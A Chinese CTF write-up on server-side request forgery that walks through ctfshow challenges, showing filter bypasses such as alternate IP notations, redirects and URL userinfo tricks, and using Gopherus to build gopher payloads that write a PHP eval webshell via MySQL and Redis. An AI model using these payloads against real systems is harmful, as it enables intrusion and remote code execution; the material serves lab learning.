SSRF及相关例题

SSRF及相关例题

服务端请求伪造(Server Side Request Forgery, SSRF)指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。

SSRF漏洞原理

(1)攻击者可以通过公网访问到一个web服务器

(2)但是攻击者无法通过公网访问到某个组织的内网

(3)果进行内网探测,且目标的内网web服务器存在ssrf漏洞,我们可以利用一个可以访问到内网服务器的服务器,此时我们可以以这个服务器为跳板去攻击其它服务器或区域

SSRF漏洞原理

(1)对内网进行端口扫描,web指纹获取等;

(2)攻击内网或本地的应用程序,例如sql注入、struts2、redis等;

(3)利用file协议进行本地文件读取;

struts2是一个Java web应用框架

redis是一种利用内存实现高效读写的内存数据结构存储系统,它可以用作数据库、缓存和消息代理

ctfshow相关例题实战

web-351

因为这个题是ssrf类型的要在公网上访问内网

再看这个题的代码发现他需要一个url参数既然要访问内网得flag我直接

payload:url=127.0.0.1/flag.php

然后就成了(离谱)

如图:

image-20240525222607962

web-352

 <?phperror_reporting(0); //表示禁用了报错功能highlight_file(__FILE__);$url = $_POST['url']; //请求一个post参数$x = parse_url($url); //利用这个函数把url拆成各个部分并将其储存在数组x中(比如协议部分、主机ip、端口号、路径)if ($x['scheme'] === 'http' || $x['scheme'] === 'https') //表示url中的协议只能是http和https {if (!preg_match('/localhost|127.0.0/')) //表示url参数不能以localhost或者是127.0.0.1开头{$ch = curl_init($url); //初始化一个curl会话并指定要访问的urlcurl_setopt($ch, CURLOPT_HEADER, 0); //0表示curl选项禁止包含响应头信息curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //设置curl选项,表示把响应信息作为字符串返回$result = curl_exec($ch); //执行curl,并将返回结果储存在变量result中curl_close($ch); //关闭curl会话echo ($result); //将变量输出} else {die('hacker');}} else {die('hacker');}?>
/* curl可以访执行http请求(包括https)和上传还有下载文件 curl工具是命令行工具和库它一般用于脚本调试还有直接使用命令行进行网络操作
如果仅仅只是访问页面那么浏览器已经足够了*/

这一关和上一关的的区别在于上一关没有限制协议类型这一关只能是http或者是https,还有一个限制条件if (!preg_match('/localhost|127.0.0/'))但是他这个代码是错的因为它没有指定正则匹配的对象所以说这个限制条件作废

直接paylod:http://127.0.0.1/flag.php

image-20240528125021255

web-353

在这一关主要是preg_match('/localhost|127\.0\.|\。/i', $url)$x['scheme']==='http'||$x['scheme']==='https'两个条件限制满足或绕过他们即可

第一个要求参数中不能有localhost和127.0.还有。我们可以尝试使用其他进制绕过比如IP常用的八进制和十六进制

还有一个条件是要使用http或者https协议

直接payload:

$url=http://0x7F000001/flag.php
或者:
$url=http://0177.0.0.1/flag.php

如图:

屏幕截图 2024-05-29 050833

常见的IP地址表示法:
  • 点分十进制(例如:127.0.0.1)
  • 八进制表示(例如:0177.0.0.1,相当于127.0.0.1)
  • 十六进制表示(例如:0x7F000001,也相当于127.0.0.1)

web-354

在这一关涉及到一个新的知识

同源策略(SOP)

同源策略是指协议+域名+端口三者相同,这个策略是浏览器的最基本的安全功能

对于一些网站会限制只有同源的情况下才可以互相访问

比如:

https://www.example.com/page1.html

https://www.example.com/page2.html

端口如果没写的话默认是443

这种同源策略可以防止xss和csrf

下面要说到的DNS重绑定就是利用了同源策略(SOP)的漏洞,如果我们只改变域名所绑定的ip但是域名本身不发生改变比如:www.example.com这个域名原来dns解析对应的ip为192.168.12.1虽然攻击者又把这个域名绑定的ip变为112.123.11.3

但是www.example.com这个域名本身不变所以仍然满足同源策略这样便实现了SOP的绕过

DNS重绑定

攻击过程:攻击者拥有一个自己的域名可以随便改变这个域名所绑定的ip

流程:

第一次DNS解析

  • 用户访问恶意网站(如 malicious.com)。
  • DNS解析返回攻击者控制的服务器IP(例如 203.0.113.5)。
  • 浏览器连接到 203.0.113.5 并加载恶意JavaScript代码。

恶意代码执行

  • 恶意代码在用户浏览器中运行,通常会包含一个定时器或某种触发机制,等待第一次DNS解析结果的TTL过期。

第二次DNS解析

  • 恶意代码触发对 malicious.com 的第二次DNS解析。
  • 此次解析返回内网IP地址(例如 192.168.1.10)。
  • 浏览器认为 malicious.com 仍然是同一个域,因此允许访问内网IP。
不能直接只是通过一个来回实现dns重绑定的原因

1.内网不能直接通过外部网络访问(它不是通过外部网络直接访问该内网IP,而是通过浏览器内的网络堆栈进行的。浏览器内的请求被视为本地网络请求。

浏览器在用户的网络环境中运行,能够直接访问用户网络内的所有资源。这意味着,尽管攻击者的初始服务器是外部的,但浏览器的后续请求是在受害者的本地网络中发起的。)

2.只有第一次解析到攻击控制的服务器ip才能执行页面上对应的javascript代码才能实现我们获取内网信息的目的

这种操作会存在至少两个危险:1.受害者点击的页面可能存在恶意代码2.如果DNS重绑定的ip是127.0.0.1可能会导致攻击者直接进入内网

防止DNS重绑定攻击
  • **用户的角度:**更改路由器的配置,过滤DNS响应中的私有IP范围等可疑IP地址。

  • **开发人员的角度:**内部的网络设备应该验证其自己的服务器是否与所请求的主机匹配。如HTTP服务器添加“主机”标头验证。只有host标头中的主机名是服务器可以提供服务的才行。(host标头通常是进行请求时的域名,如果这个这个域名没有通过服务器的验证,那么服务器就不会为这个ip提供服务)

另一种有效方法是使用HTTPS而不是HTTP,发生重新绑定时,目标服务将具有对www.hacker.com无效的SSL证书,因此安全警告将阻止你的请求。 (即使你把www.hacker.com这个域名绑定到127.0.0.1上无论本地有没有配置有效的SSL证书,这个访问操作都会受到浏览器的阻止 因为自签名证书是不受信任的)

这还涉及到DNS劫持因为只有这样才能在用户进行解析域名的时候是引导到攻击者控制的dns解释器中把域名解析成任意IP

查看本地DNS缓存及相关操作
ipconfig /displaydns
用于查看本地的dns缓存

如图:

屏幕截图 2024-05-29 211555

nslookup 域名
用于查看一个域名的ip

如图:

屏幕截图 2024-05-29 211633

我们可以在事件查看器中去手动开启本地的dns具体操作自己找

也可以改本地的dns中的数据这样对于一个目标机器我们可以随便更改dns中的域名所对应的ip进而实现进一步利用

web-354

这一关的主要条件是if(!preg_match('/localhost|1|0|。/i', $url))发现这关的过滤比较严格在字符串中不能含有localhost 1 0 和 。显然这一关显然不能使用localhost和127.0.0.1当然八进制和十进制也是不行的

对于这个题可以不用那么麻烦网上有现成的

参考https://blog.csdn.net/lovelyelfpop/article/details/107306577

直接payload:url=http://safe.taobao.com/flag.php

如图:

image-20240529214311254

web-355

本关的知识:

0在linux系统中会解析成127.0.0.1,而在windows中会解析成0.0.0.0 127.1和127.0.0.1是等价的

如何查看一个网页的服务器是什么系统

可以使用https://sitereport.netcraft.com/这个网站查询也可以随便输入个路径或F12看响应头的server看有没有如图:

image-20240531191042648

image-20240531191101348

对于这个网站就设置了无法访问的时候显示404但是我们仍然可以看到所使用的web服务器是nginx服务器 可以猜测操作系统是linux 虽然 Nginx 也可以在 Windows 上运行,但它通常在 Linux 上被广泛使用作为 Web 服务器。

0.0.0.0表示所有可用的ip地址如果直接在URL栏中输入 0.0.0.0 并不会打开一个网页,而是可能导致浏览器尝试连接到一个无效的IP地址或者显示错误信息

如果在命令行中ncat -l 0.0.0.0表示监听所有IPv4地址的所有网络接口

跟据源码显示这一关的限制主要是host的长度小于5 strlen($host)<=5

做题:

这关的host可以使用0或者127.1来代替

综上直接payload:url=http://0/flag.php或者url=http://127.1/flag.php

如图:

屏幕截图 2024-05-31 163348

屏幕截图 2024-05-31 173846

web-356

对于这一关和上一关的主要区别在于缩短了host的长度限制strlen($host)<=3

直接payload:url=http://0/flag.php

跟上一关基本没去别至于为什么使用0可以代替127.0.0.1的思路上一关有提到

如图:

image-20240531201249122

web-357

这关我们主要是认识一下新出现的过滤条件

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$ip = gethostbyname($x['host']);//把host主机名解析成ip地址
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE))
//FILTER_VALIDATE_IP验证解析出来的ip是否是有效ip
//FILTER_FLAG_NO_PRIV_RANGE验证解析出来的ip是否是私有ip
//FILTER_FLAG_NO_RES_RANGE验证解析出来的ip是否是保留ip
{die('ip!');
}echo file_get_contents($_POST['url']);//可以访问到对应的url中并且输出页面中的内容
}
else{die('scheme');
}
?> 

方法一、

可以通过一个自己的网站来跳转访问到127.0.0.1/flag

在自己网站的根目录下创建一个用来跳转的php文件

test.php文件内容

<?php
header("Location:http://127.0.0.1/flag.php");
?>

然后payload:url=http://ip或域名//test.php(ip或域名天自己的)

直接传参如图:

image-20240601150313405

web-358

在这一关只有一个限制条件

preg_match('/^http:\/\/ctf\..*show$/i',$url)

表示传入参数要以http://ctf.开头以show结尾

.*:匹配任意数量的任意字符(除了换行符)

^:匹配字符串的开头

$:匹配字符串的结尾

直接payload:url=http://ctf.@127.0.0.1/flag.php?show

在http://和@之间的ctf.表示用户名 一般是username:passworld如果没有密码

冒号也可以省略 这是用户信息部分用于进行信息验证

后面的show只是为了满足是以show结尾这个条件?是为了让其成为参数这样不影响正常网站的访问

结果如图:

image-20240602130344118

web-358

这关要使用到一个gopherus

先来了解一下什么是gopher,它比www的作用小一点主要是用来处理静态的页面交互性比www差 现在很少用到

**www(World Wide Web)**代表着万维网,是一个基于超文本的信息系统,通过互联网访问,并由许多网页组成。它是通过HTTP(超文本传输协议)来传输数据的

Gopher是一种早期的互联网信息检索协议,旨在提供简单的、层次化的文档检索系统。与WWW不同,它更加简单且层次化

示例:

gopher://gopher.floodgap.com 使用 Gopher 协议,访问的是提供 Gopher 服务的服务器

**https://www.baidu.com**使用的是https协议,访问的是提供web服务的服务器

www对应http、https协议

gopher对应gopher协议

工具下载:https://github.com/Esonhugh/Gopherus3(最新地址可适配python3)

工具的是使用:

如果您知道某个地方存在 SSRF 漏洞,那么此工具将帮助您生成 Gopher 有效负载,以利用 SSRF(服务器端请求伪造)并获得 RCE(远程代码执行)。此外,它还将帮助您在受害服务器上获取反向 shell。有关更多信息,您可以在Gopherus 上的同一个博客上找到一篇博客

该工具可以为以下对象生成payload:

  1. MySQL(端口 3306)
  2. PostgreSQL(端口-5432)
  3. FastCGI(端口 9000)
  4. Memcached(端口 11211)
    • 如果存储的数据通过以下方式进行反序列化:
      • Python
      • 红宝石
      • PHP
  5. Redis(端口-6379)
  6. Zabbix(端口 10050)
  7. SMTP(端口 25)
这篇文章讲解的ssrf比较全面推荐看看https://www.freebuf.com/articles/web/260806.html
做题:

此题登进去是一个登录界面我先扫了一下后台如图:

屏幕截图 2024-06-03 202239

没啥东西抓个登录包看看如图:

image-20240603223411497

由图可知是向check.php页面提交的信息从提交的数据中可以明显的看出参数returl(return url)是一个回调url

如果页面对这个url没有进行严格的控制有可能被利用

根据提示可知这关是打无密码的mysql

屏幕截图 2024-06-03 230655

直接利用Gopherus的mysql模块去构造mysql的payload(分别依次输入)

python gopherus.py --exploit mysql//指定使用mysql模块
root //输入没有密码的mysql的用户名
select "<?php @eval($_POST['cmd']);?>" into outfile '/var/www/html/aa.php';//把一句话木马写到指定的路径下

/var/www/html一般网页的主要功能文件都在这个目录下

如图:

image-20240603231057320

在3306/_的后面是经过十六进制编码后的一句话木马

Gopher协议格式

URL: gopher://<host>:<port>/<gopher-path>_后接TCP数据流
#
注意必须相信后面那个下划线"_",下划线"_"后面才开始接TCP数据流,如果加这个"_",那么服务端收到的消息将不是完整的,该字符可随意写。

TCP流中的数据在传输过程中通常以二进制形式表示。在网络传输中,数据往往以字节为单位进行传输。这意味着在实际传输过程中,数据以二进制形式进行编码。

然而,在分析和查看TCP流时,通常将数据以十六进制的形式呈现出来,这样做更方便阅读和理解数据的内容。因此,当我们查看TCP流时,经常会看到十六进制表示的数据。

Gopher链接中的所有非标准ASCII字符,最好都进行URL编码,以确保它们能够正确传输和解析

所以我们要把3306/_的后面的数据进行一次url编码

最后直接payload:

%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%254c%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2540%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2527%2563%256d%2564%2527%255d%2529%253b%253f%253e%2522%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2561%2561%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501

然后post传入如图:

image-20240603235737197

image-20240603235759776

flag.txt在根目录

web-359

这关提醒我们去打redis直接和上一关进行类似操作

python gopherus.py --exploit redis
phpshell
<?php eval($_POST['cmd']);?>

image-20240604000449126

image-20240604000518131

![image-20240604001404889](https://img-blog.csdnimg.cn/img_convert/18a087cf4df0c9e79634a1ec8a72d请添加图片描述
eaf.png)

根目录下找到flag

OVER!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/21798.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

sql注入 (运用sqlmap解题)

注:level参数 使用–batch参数可指定payload测试复杂等级。共有五个级别&#xff0c;从1-5&#xff0c;默认值为1。等级越高&#xff0c;测试的payload越复杂&#xff0c;当使用默认等级注入不出来时&#xff0c;可以尝试使用–level来提高测试等级。 --level 参数决定了 sql…

鸿蒙应用开发之OpenGL应用和X组件12

在这个应用程序里还有一个功能,就是点击绘画四边形作出响应,也就是触摸X组件进行响应,所以X组件的点击函数响应在前面已经做设置了回调,当用户触摸这个组件时,就会调用函数DispatchTouchEventCB,再从这个函数里调用渲染对象的函数ChangeColor来改变颜色,如下两图是不同的…

<网络安全VIP>第二篇《工业控制软件》

1 PLC PLC,(Programmable Logic Controller),可编程逻辑控制器(PLC)是种专门为在工业环境下应用而设计的数字运算操作电子系统。 2 DCS 四、DCS的发展趋势 一、DCS的基本定义 DCS是分布式控制系统(Distributed Control System)的英文缩写,在国内自控行业又称之为集…

使用wireshark分析tcp握手过程

开启抓包 tcpdump -i any host 127.0.0.1 and port 123 -w tcp_capture.pcap 使用telnet模拟tcp连接 telnet 127.0.0.1 123 如果地址无法连接&#xff0c;则会一直重试SYN包&#xff0c;各个平台SYN重试间隔并不一致&#xff0c;如下&#xff1a; 异常站点抓包展示&#xff…

Fatfs

STM32进阶笔记——FATFS文件系统&#xff08;上&#xff09;_stm32 fatfs-CSDN博客 STM32进阶笔记——FATFS文件系统&#xff08;下&#xff09;_stm32 文件系统怎样获取文件大小-CSDN博客 STM32——FATFS文件基础知识_stm32 fatfs-CSDN博客 021 - STM32学习笔记 - Fatfs文件…

godot.bk4:how to make NPC roam and attack player with global variable‘s usage

1.为什么会有重力的影响&#xff1a;因为CharacterBody2D默认的代码是重力影响的&#xff0c;删掉即可 只需要添加 extends CharacterBody2Dconst SPEED 200.0 var directionfunc _physics_process(delta):direction Input.get_vector("ui_left", "ui_right&…

第一周:计算机网络概述(上)

一、计算机网络基本概念 1、计算机网络通信技术计算机技术 计算机网络就是一种特殊的通信网络&#xff0c;其特殊之处就在于它的信源和信宿就是计算机。 2、什么是计算机网络 在计算机网络中&#xff0c;我们把这些计算机统称为“主机”&#xff08;上图中所有相连的电脑和服…

【Java】---- SpringBoot 统一数据返回格式

目录 1. 统一数据返回格式介绍2. 实际应用2.1 添加前后的返回结果区别2.2 存在问题 3. 统一数据返回格式的优点 1. 统一数据返回格式介绍 通过使用ControllerAdvice和引用ResponseBodyAdvice接口来进行实现。 ResponseBodyAdvice这个接口里面有两个方法&#xff0c;分别是: s…

【专利 超音速】基于分类模型的轻量级工业图像关键点检测方法

申请号CN202311601629.7公开号&#xff08;公开&#xff09;CN117710683A申请日2023.11.27申请人&#xff08;公开&#xff09;超音速人工智能科技股份有限公司发明人&#xff08;公开&#xff09;张俊峰(总); 杨培文(总); 沈俊羽; 张小村 摘要 本发明涉及一种基于分类模型的…

外星人Alienware m16R1 原厂Windows11系统 oem系统

装后恢复到您开箱的体验界面&#xff0c;包括所有原机所有驱动AWCC、Mydell、office、mcafee等所有预装软件。 最适合您电脑的系统&#xff0c;经厂家手调试最佳状态&#xff0c;性能与功耗直接拉满&#xff0c;体验最原汁原味的系统。 原厂系统下载网址&#xff1a;http://w…

VB.net实战(VSTO):Excel插件设计Ribbon界面

1. 新建Ribbon 1.1 开发环境 Visual Studio 2022 1.2 解决方案资源管理器中右击My Project 1.3 添加》新建项 1.4 office/SharePoint》功能区(可视化设计器)&#xff0c;双击 2.调出工具箱 Visual Studio 2022》视图》工具箱 3.设计界面 3.1 添加功能区选项卡 3.2拖动Group…

深度强化学习+大模型综述Survey on Large Language Model-Enhanced Reinforcement Learning

论文地址&#xff1a;[2404.00282] Survey on Large Language Model-Enhanced Reinforcement Learning: Concept, Taxonomy, and Methods (arxiv.org) 摘要 对 LLM 增强 RL 中现有文献进行了全面的回顾&#xff0c;并总结了其与传统 RL 方法相比的特征&#xff0c;旨在阐明未…

混合A*算法详解(一)路径搜索

描述 为了学习一下混合A*算法&#xff0c;我前面介绍了车辆运动学及非完整约束、差速轮及阿克曼运动学模型、Dubins曲线和RS曲线&#xff0c;现在终于可以看一下混合A*算法的相关内容了。 原文名称&#xff1a;Practical Search Techniques in Path Planning for Autonomous D…

Mac解决command not found:mvn 保姆级

1.背景 mac电脑已经安装了jdk1.8。如果不清楚自己jdk安装位置的可以到idea查看。但是命令行执行 mvn 会报 command not found 2.解决方案 默认安装的 jdk 是没有配置环境变量&#xff0c;因此需要手动配置 通常如果是默认安装则路径都会一样直接复制即可&#xff0c;只需更…

驱动开发之设备树语法

0.设备树由来 通过前面platform实验&#xff0c;使用platform总线&#xff0c;device与driver需要匹配才可以&#xff0c;device主要是存储一些硬件信息的&#xff0c;传递给driver使用。这样就会导致大量的硬件信息在linux内核源码里面&#xff0c;arch/arm/mach-xxx 和 arch…

undefined symbol: _ZN3c104impl8GPUTrace13gpu mmcv

这里写自定义目录标题 ImportError: //python3.8/site-packages/mmcv/_ext.cpython-38-x86_64-linux-gnu.so: undefined symbol: _ZN3c104impl8GPUTrace13gpuTraceStateEERROR conda.cli.main_run:execute(49): 这样的问题往往都是版本不匹配导致的 pytorch的版本&#xff0c;m…

【C++】类和对象1.0

本鼠浅浅介绍一些C类和对象的知识&#xff0c;希望能得到读者老爷们的垂阅&#xff01; 目录 1.面向过程和面向对象 2.类的引入 3.类的定义 4.类的访问限定符及封装 4.1.类的访问限定符 4.2.封装 5.C中struct和class的区别 6.类域 7.类的实例化 8.类对象模型 8.1.类…

线性代数|机器学习-P5特征值和特征向量

文章目录 1. 特征值和特征向量1.1 特征向量1.2 向量分解 2. 矩阵相似2.1 特征值求解法-相似2.2 特殊特征值2.3 反对称矩阵 3.对称矩阵 1. 特征值和特征向量 1.1 特征向量 假设有一个n行n列的方阵A&#xff0c;有 n 个不相同的特征值为 λ \lambda λ,特征向量为 x 1 , x 2 , …

(2022,扩散模型,评分函数,数据流形的内在维度,SVD)使用扩散模型估计数据流形的维度

Your diffusion model secretly knows the dimension of the data manifold 公和众和号&#xff1a;EDPJ&#xff08;进 Q 交流群&#xff1a;922230617 或加 VX&#xff1a;CV_EDPJ 进 V 交流群&#xff09; 目录 0. 摘要 1. 引言 2. 相关工作 3. 背景&#xff1a;基于评…

【YOLOv5/v7改进系列】引入Slimneck-GSConv

一、导言 GSConv旨在平衡模型的准确度与速度&#xff0c;针对自动驾驶车辆中目标检测任务设计。从类脑研究中得到的直观理解是&#xff0c;具有更多神经元的模型能够获得更强的非线性表达能力。但是&#xff0c;不容忽视的是生物大脑处理信息的强大能力和低能耗远远超过计算机…